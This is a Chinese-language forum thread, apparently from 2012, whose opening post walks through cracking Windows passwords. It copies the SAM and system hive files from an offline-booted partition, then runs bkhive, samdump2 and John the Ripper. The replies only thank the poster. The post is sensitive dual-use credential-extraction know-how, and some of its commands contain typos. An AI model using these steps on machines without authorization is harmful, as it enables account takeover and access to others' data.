家电维修网

 找回密码
 注册
查看: 933|回复: 4

[下载] SAM密码的破解方法

[复制链接]

中级会员

Rank: 2

回帖
24
主题
22
积分
261
在线时间
34 小时
注册时间
2012-4-18
最后登录
2013-8-21
发表于 2012-5-24 05:38 | 显示全部楼层 |阅读模式
用Linux启动,并挂载Windows的系统分区把c:\windows\system32\config\目录下的SAM和system复制出来

也可以用WINPE,DOS引导盘,都可以的,只要把SAM和system复制出来就行

开始破解:

bkhive system keys   ——生成keys文件

samdump2 SAM keys > hashes ——用SAM和keys生成hashes<--IWMS_AD_BEGIN-->  
<--IWMS_AD_END-->

john hashes   ——跑hashes

友情提示:

可以直接访问 在线查询hash

现在没有在Linux下,改天上图,下面我文字描述一下

mount -t ntfs /dev/hda1 /mnt/windows

mkdir /home/young001/sam

cp /mnt/windows/WINDOWS\system32\config/SAM /home/young001/sam

cp /mnt/windows/WINDOWS\system32\config/system /home/young001/sam

unount /mnt/windows

cd /home/young001/sam

bkhive system keys

samdump2 SAM keys > hashes

john hashes   ——跑hashes

这样密码揪出来了

另外加上一些提示:

比如administrator密码是123456,那么他会在最底下这么显示

administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起来有点像/etc/passwd的内容格式,如果当时没有看清楚密码就清屏了,或者后来忘记已经破解了的密码,可以通过下面命令查看

john-1.7.2/run/john -show hashes有的时候密码处有可能会显示几个问号,如下

administrator:???456:500:e263f50a6a506be3d494d3d62b4dc666:::这个时候可以通过

john-1.7.2/run/john -show hashes看看密码是否完整。 如果还是不完整,那么可能密码没有完全破解完毕,可以加–restore 参数从原来基础上继续破解

john-1.7.2/run/john ——restore hashes

初级研究师

Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15

回帖
2503
主题
33
积分
11452
在线时间
774 小时
注册时间
2011-8-28
最后登录
2014-4-24

热心会员常驻会员论坛贡献勋章杰出贡献勋章论坛贡献勋章乐于助人勋章杰出贡献勋章论坛贡献勋章推广活动勋章灌水高手勋章

发表于 2012-5-24 06:05 | 显示全部楼层
楼主辛苦了
回复 支持 反对

使用道具 举报

高级会员

Rank: 3Rank: 3

回帖
134
主题
0
积分
642
在线时间
22 小时
注册时间
2012-4-14
最后登录
2014-3-11
发表于 2012-5-24 09:40 | 显示全部楼层
楼主厉害啊 这么高难度的工作都能做
回复 支持 反对

使用道具 举报

初级讲师

Rank: 12Rank: 12Rank: 12

回帖
1145
主题
218
积分
3781
在线时间
734 小时
注册时间
2012-10-21
最后登录
2019-6-8

热心会员常驻会员

发表于 2012-11-24 11:22 | 显示全部楼层
{:soso_e100:}{:soso_e183:}感谢楼主分享。。。路过学习了
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|门户地图|网站地图|家电维修|手机版|家电维修技术论坛 ( 蜀ICP备14030498号-16 川公网安备51102502000162号 )

GMT+8, 2025-6-13 19:54

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表